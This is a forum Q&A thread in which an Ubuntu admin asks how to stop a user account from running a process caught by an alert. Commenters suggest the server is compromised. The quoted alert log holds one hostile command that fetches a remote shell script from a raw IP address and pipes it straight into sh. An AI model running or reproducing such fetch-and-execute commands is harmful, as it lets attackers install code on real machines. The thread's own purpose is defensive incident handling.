# Process alert - stop or block user from doing this

Tags: linux, ubuntu, process, acl

How would i resolve this issue? I have already tried following [How to disable a specific command for a specific user in Linux](https://www.thegeekdiary.com/how-to-disable-a-specific-command-for-a-specific-user-in-linux/) from The Geek Diary

```
User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
```

Edit #1

running `getfacl /usr/bin/wget` I get:

```
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/wget
# owner: root
# group: root
user::rwx
user:clipdrop:---
group::r-x
mask::r-x
other::r-x
```

Comment: You want the user not to be able to run `wget`is that it? what does `getfacl /usr/bin/wget` report? Note that there are **many** ways to do something like that without using `wget` (`curl`, `socat`, `python`, `ruby`, `perl`, ...). You might want to take a more *educative* approach.

Comment: Is this about a compromised server? If so, the server is compromised and you should focus on removing it from the public internet, reinstalling it from a recent (clean) backup, and possibly, depending on who and where you are, reporting the incident to the appropriate authorities.

Answer (score 1, accepted):

On Unix/Linux, it is just much too easy to just get alternative tools to do any nefarious act (to download random files, use `curl`, any of the FTP clients, use the web browser, even use the web browser in emacs; grab sources from a control version system and compile themselves; use e.g. Python, Perl which have most of the "typical" networking tasks either built in or as part of more or less standard libraries).